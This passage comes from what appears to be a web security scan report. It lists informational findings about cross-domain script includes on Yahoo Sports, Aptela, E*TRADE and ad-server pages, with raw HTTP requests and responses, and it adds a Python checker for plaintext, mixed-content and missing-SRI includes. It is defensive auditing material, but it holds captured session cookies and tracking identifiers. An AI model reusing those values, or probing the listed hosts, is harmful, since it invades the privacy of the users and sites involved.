GET /mlb/recap;_ylt=AiqN_12mg5CSzn6lUavzCZ85nYcB?gid=310905122 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; MwPhCom_degraded_status=false; adxid=016e3b4e6615bdb5; YWP_VOLUME=0.5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160; spt_site=scorethin_league=nascar

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:19 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Set-Cookie: MwPhCom_degraded_status=false; path=/
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 2
Proxy-Connection: keep-alive
Via: HTTP/1.1 r4.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 247599

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Lee tosses another gem, shuts out Braves - MLB - Yahoo! Sports</title>
<meta http-e
...[SNIP]...
</script>
<script charset="utf-8" src="http://l.yimg.com/j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js?z&m"></script>
...[SNIP]...
</script>

<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/eJx1kM0OgyAQhJ_IKqD8pA_TbIFULLCG1TT26av00F48bXbmy-xmJmoTZHj4cimsF5yz60SthYIr-fivuUA2Iq3F76pkqu8OldAGiLf7uiyYaXeUEYIfTvIuwBxhq9FKa9nXaEwJc7vR3CR0ddIIxTfL6BuyWOM1Gzg_oe3o7TPkg-oMFyfUHOyTapI0-oSJ8N4igvs-2LNBnp381TEobWodL4Tx2A038gO2NW8j.js?z&m"></script>
...[SNIP]...
<div id="ad-347035" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"><script type="text/javascript" src="http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=954x60_spon&ymlb_rollup=news&page.allowcompete=yes&tile=1315313419813817&transactionID=1315313419813817"></script>
...[SNIP]...
<div id="ad-289494" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"><script type="text/javascript" src="http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=160x600_bot&ymlb_rollup=news&page.allowcompete=yes&tile=1315313419813817&transactionID=1315313419813817"></script>
...[SNIP]...
</script><script src="http://ads.yimg.com/a/a/1-/jscodes/flash9/misc_9as2_20081114.js"></script>
...[SNIP]...
<div id="ad-745217" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"><script type="text/javascript" src="http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=300x250_rgt&ymlb_rollup=news&page.allowcompete=yes&tile=1315313419813817&transactionID=1315313419813817"></script>
...[SNIP]...
</div>
<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/video/dash-players/yep-player.r169686;js/video/dash-players/dash-players.r176591;js/video/dash-players/dash-players-init.r174877.js?m"></script>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?d/lib/yui/2.9.0/build/yahoo/yahoo-min.js&d/lib/yui/2.9.0/build/event/event-min.js&d/lib/yui/2.9.0/build/dom/dom-min.js&d/lib/yui/2.9.0/build/imageloader/imageloader-min.js&d/lib/yui/2.9.0/build/get/get-min.js&d/lib/yui/2.9.0/build/connection/connection-min.js&d/lib/yui/2.9.0/build/animation/animation-min.js&d/lib/yui/2.9.0/build/json/json-min.js&d/lib/yui/2.9.0/build/container/container-min.js&d/lib/yui/2.9.0/build/element/element-min.js&d/lib/yui/2.9.0/build/cookie/cookie-min.js&d/lib/media/phugc/mwphcom_min_r142.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/teamtracker.r143221.js?m"></script>
...[SNIP]...

16.42. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:41 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Set-Cookie: MwPhCom_degraded_status=false; path=/
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 6
Proxy-Connection: keep-alive
Via: HTTP/1.1 r1.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 291643

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Tiki Barber remains unemployed and sad - Shutdown Corner - NFL&nbsp;Blog - Yahoo! Spor
...[SNIP]...
</script>
<script charset="utf-8" src="http://l.yimg.com/j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js?z&m"></script>
...[SNIP]...
</script>

<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/eJx1kM0OgyAQhJ_IKqD8pA_TbIFULLCG1TT26av00F48bXbmy-xmJmoTZHj4cimsF5yz60SthYIr-fivuUA2Iq3F76pkqu8OldAGiLf7uiyYaXeUEYIfTvIuwBxhq9FKa9nXaEwJc7vR3CR0ddIIxTfL6BuyWOM1Gzg_oe3o7TPkg-oMFyfUHOyTapI0-oSJ8N4igvs-2LNBnp381TEobWodL4Tx2A038gO2NW8j.js?z&m"></script>
...[SNIP]...
</script><script id="load_wrapper" type="text/javascript" src="http://mi.adinterax.com/wrapper.js"></script>
...[SNIP]...
<!--Vendor: Factor TG, Format: Pixel, IO: 774106--><SCRIPT LANGUAGE="JavaScript" SRC="http://as1.suitesmart.com/99917/G15493.js?GID=15493"></SCRIPT>
...[SNIP]...
</script><script id="load_wrapper" type="text/javascript" src="http://mi.adinterax.com/wrapper.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?d/lib/yui/2.9.0/build/yahoo/yahoo-min.js&d/lib/yui/2.9.0/build/event/event-min.js&d/lib/yui/2.9.0/build/dom/dom-min.js&d/lib/yui/2.9.0/build/imageloader/imageloader-min.js&d/lib/yui/2.9.0/build/get/get-min.js&d/lib/yui/2.9.0/build/connection/connection-min.js&d/lib/yui/2.9.0/build/animation/animation-min.js&d/lib/yui/2.9.0/build/json/json-min.js&d/lib/yui/2.9.0/build/container/container-min.js&d/lib/yui/2.9.0/build/element/element-min.js&d/lib/yui/2.9.0/build/cookie/cookie-min.js&d/lib/media/phugc/mwphcom_min_r142.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/teamtracker.r143221.js?m"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

16.43. http://support.aptela.com:9000/tools/ResetPassword.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.aptela.com:9000
Path:   /tools/ResetPassword.cgi

Issue detail

The response dynamically includes the following script from another domain:

http://api.recaptcha.net/challenge?k=6LcRywAAAAAAAIijUtl1YQuO3f7q2GQasRd83JZx

Request

GET /tools/ResetPassword.cgi HTTP/1.1
Host: support.aptela.com:9000
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/my-account/login-error/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; WRUID=1480628145.1067928662; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.8.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:48 GMT
Server: Apache/2.0.55 (Ubuntu) mod_jk/1.2.20 PHP/5.1.2 mod_ssl/2.0.55 OpenSSL/0.9.8a
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 2021


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Aptela Password Request</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta htt
...[SNIP]...
<td valign="top">
<script src="http://api.recaptcha.net/challenge?k=6LcRywAAAAAAAIijUtl1YQuO3f7q2GQasRd83JZx" type="text/javascript"></script>
...[SNIP]...
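The check behind these "cross-domain script include" findings, written out as an added example (this is not code from the XSS.Cx report or from Burp): it parses a response body, resolves every script src against the page URL, and reports the ones whose host differs from the page host. Two checks the 2011 report does not make are added, because they are what a reviewer wants today: whether the include is fetched over plaintext http (including protocol-relative // includes on an http page, and mixed content on an https page), and whether the tag carries an integrity attribute (Subresource Integrity, which postdates this report). Treating the port as irrelevant to "same domain" is my assumption about how the scanner compares hosts. The sample page below is constructed from tags that appear in the responses in this report; the function names are my own.

```python
"""Flag cross-domain <script src> includes in an HTTP response body.

Added example, not part of the original report. Reproduces the
cross-domain script include check and adds transport-downgrade and
missing-SRI checks. Sample input is constructed from tags seen in the
report responses.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _ScriptSrcCollector(HTMLParser):
    """Collect (src, has_integrity) for every <script> tag with a src attribute."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        # HTMLParser gives None for valueless attributes; normalise to ""
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if "src" in attrs:
            self.scripts.append((attrs["src"].strip(), "integrity" in attrs))


def _host(netloc):
    # Assumption: compare hostnames only, so "support.aptela.com:9000" and
    # "support.aptela.com" count as the same domain. Strip userinfo and port.
    return netloc.rsplit("@", 1)[-1].split(":", 1)[0].lower()


def find_cross_domain_scripts(page_url, body):
    """Return one dict per external <script src> whose host differs from the page host."""
    page = urlsplit(page_url)
    collector = _ScriptSrcCollector()
    collector.feed(body)
    findings = []
    for src, has_sri in collector.scripts:
        # urljoin resolves relative paths, and "//host/path" against the page scheme,
        # which is exactly how the browser will fetch the script
        resolved = urlsplit(urljoin(page_url, src))
        if resolved.scheme not in ("http", "https"):
            continue  # data:, javascript: etc. are not remote includes
        if _host(resolved.netloc) == _host(page.netloc):
            continue  # same host: not a cross-domain include
        findings.append({
            "src": src,
            "url": resolved.geturl(),
            "host": _host(resolved.netloc),
            # fetched over plaintext: anyone on the network path can replace the script
            "plaintext": resolved.scheme == "http",
            # https page pulling an http script: mixed content, blocked by current browsers
            "mixed_content": page.scheme == "https" and resolved.scheme == "http",
            # integrity= present: browser verifies the script hash before executing it
            "sri": has_sri,
        })
    return findings


# Constructed sample page, assembled from tags visible in the report responses.
SAMPLE_PAGE_URL = "http://support.aptela.com:9000/tools/ResetPassword.cgi"
SAMPLE_BODY = """<html><head>
<script src="/js/local.js"></script>
<script src="http://api.recaptcha.net/challenge?k=6LcRywAAAAAAAIijUtl1YQuO3f7q2GQasRd83JZx" type="text/javascript"></script>
<script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
<script src="http://support.aptela.com/same-host-different-port.js"></script>
</head></html>"""

if __name__ == "__main__":
    for f in find_cross_domain_scripts(SAMPLE_PAGE_URL, SAMPLE_BODY):
        flags = [k for k in ("plaintext", "mixed_content") if f[k]]
        if not f["sri"]:
            flags.append("no-sri")
        print(f["url"], ",".join(flags))
```

On the sample page the relative include and the same-host include on a different port are skipped; the three remaining includes are reported, with the protocol-relative authorize.net tag resolved to http because the page itself is http.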

16.44. http://udmserve.net/udm/img.fetch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://udmserve.net
Path:   /udm/img.fetch

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET /udm/img.fetch?sid=2900;tid=1;ev=1;dt=1; HTTP/1.1
Host: udmserve.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=4;sz=728x90;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT'
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT"
Set-Cookie: udm1=9173:1:63440343958:2:2900:0:0:63440343958:1:1|; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12:45:58 GMT
Set-Cookie: dt=9b3eab00-120f-460c-84d6-3607c7ca9d48; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12:45:58 GMT
Expires: Mon, 05 Sep 2011 12:45:58 GMT
Date: Tue, 06 Sep 2011 12:45:58 GMT
Content-Type: text/html; charset=ISO-8859-1
Server: lighttpd/1.4.28
Content-Length: 1337

<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

16.45. https://us.etrade.com/e/t/jumppage/viewjumppage

Summary

Severity:   Information
Confidence:   Certain
Host:   https://us.etrade.com
Path:   /e/t/jumppage/viewjumppage

Issue detail

The response dynamically includes the following scripts from other domains (all over https, so no mixed content on this https page):

https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/js/nav.js
https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/global_nav.js
https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/jquery/jquery.min.js
https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/prospect/tooltip_popup.js
https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/omntr/s_code.js
https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/omntr/mbox.js

Request

GET /e/t/jumppage/viewjumppage?PageName=top_bullish_stocks&SC=S047401&o_id=60DAY+500&symbol=&ch_id=d&s_id=yhoo&c_id=BLLST HTTP/1.1
Host: us.etrade.com
Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:06 GMT
Server: Apache
Keep-Alive: timeout=60, max=400
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 24371


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
    <title>Today's Top 10 Bullish Stocks | E*TRADE Securities</title>
   
...[SNIP]...
<![endif]-->
   
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/js/nav.js" ></script>
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/global_nav.js" ></script>
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/jquery/jquery.min.js" ></script>
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/prospect/tooltip_popup.js" ></script>
    <!-- Site Catalyst -->
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/omntr/s_code.js" ></script>
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/omntr/mbox.js" ></script>
...[SNIP]...

16.46. http://utdi.reachlocal.net/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /index.html

Issue detail

The response dynamically includes the following script from another domain (protocol-relative, so on this http page it is fetched over plaintext http):

//rtsys.rtrk.com/js/TrackLandingPage_src.js

Request

GET /index.html HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:06 GMT
Server: ConcentricHost-Ashurbanipal/2.0 (Concentric(R))
X-RL-Host: pweb109
X-Robots-Tag: noindex,nofollow
Last-Modified: Wed, 31 Aug 2011 22:29:49 GMT
ETag: "15f966a-5607-4e5eb5dd"
Accept-Ranges: bytes
Content-Type: text/html
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 22692
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7c45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:00 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><meta name="robots" content="noindex,nofollow" />
<meta http-equiv="Content-Type" co
...[SNIP]...
</html>

<script type="text/javascript" src="//rtsys.rtrk.com/js/TrackLandingPage_src.js">
</script>
...[SNIP]...

16.47. http://view.atdmt.com/TR1/iview/332867993/direct/01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /TR1/iview/332867993/direct/01

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=123400100201TR1&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1024038&sid=332867993&adid=
http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=1042775&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1043704&sid=332867993&adid=

Request

GET /TR1/iview/332867993/direct/01?time=1315313115&click=http://ads.bluelithium.com/clk?3,eAGlkEtvm0AUhf9MV5XLzDAzDAmaxfBweBhjHBybbCweDg7ggoHIpr--qK6t7ns255Ou7rm6B2EtQ.SDoYMCP57QQWW5hrCMDxlVkIpmUNM0mamEyQRBONt5G1PYxtIR-tlpN-KmrnXDvyiEL5w7QyFCYRqu8jX5H3lJf71P.8.N3H0cmg4Wt7Ria89XpaM.sk3rEkfhZSnHZLENSWDGgx.Na9-AJD754yLKyHuUV370dlq-LCv.sSj47DgM7TMARd2kSS0lXS6NybFppKw5gVfnhSN6VoqirA.A50xlKsYSIiqEmLAJ6CQZTYAYIzIDJu.bpht68MplqihElemzv7YMsB.rgYvyTTlXaZ.1QWevrzT2gvgTQvozznQQ81jYQQCs3YojjCiWIYYULHjWtNf91nNWFmvFui2jWrqUoav6x5wlFT3Nc0sYi.0voPN4311FrpvrsfgB3FvMlAUpQ1h9YsDjnZpcdtmmcu0yTT9x-D6mWRMCwRVCCcIErDkE37.da7l9808lvwEx7qgw, HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAHCNIABqIpUAAAAAAArpJQAAAAAAAAAMAIAAAAAAAA0AAQADCJ6uAQAAAAAAKasxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAgAAAAAAAIBYzSd4lD8AAMR19m7APwAAAAAAAAAAAADEdfZuwD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTzbx8WfquCrkAQGF3mkTKtl2.WiYSu9rp2McYAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15q6ggjle%2FM%3D787833.14800347.14555521.14177427%2FD%3Dsports%2FS%3D25664825%3AMREC%2F_ylt%3DAjV6qkbscsOrHRx5YKOYi005nYcB%2FY%3DYAHOO%2FEXP%3D1315320305%2FL%3Dcopx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z%2FB%3DY_rxAdBDRyg-%2FJ%3D1315313105713897%2FK%3Dr8awXcUkJHjbbi3QZybcoQ%2FA%3D6454134%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,B%3D10%26S%3D14800347%26Z%3D300x100%26_PVID%3Dcopx%255fWKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL%255fz%26_salt%3D678154096%26cb%3D1315313105713897%26i%3D140509%26r%3D0%26ycg%3D%26yyob%3D%26zip%3D,10a407f8-d886-11e0-8bc2-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:15 GMT
Connection: close
Content-Length: 9420

<html><head><title>multipolicy_300x100</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=123400100201TR1&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1024038&sid=332867993&adid="></script><script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=1042775&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1043704&sid=332867993&adid="></script>
...[SNIP]...

16.48. http://www.aptela.com/lp2011/T2V1/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /lp2011/T2V1/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://munchkin.marketo.net/js/munchkin.js
http://thesearchagency.net/tsawaypoint.php?siteid=784&wayid=6025
https://lct.salesforce.com/sfga.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /lp2011/T2V1/?utm_source=google&utm_medium=ppc&utm_term=business_telephone_service&utm_campaign=phones_business&refcd=GO000000516757112s_business_telephone_service&tsacr=GO7010955737&_kk=e5cfc5b1-4c17-4425-8b78-9c87aae9c019&_kt=7010955737&gclid=CMqnsqPHiKsCFRM2gwodbCP53A HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
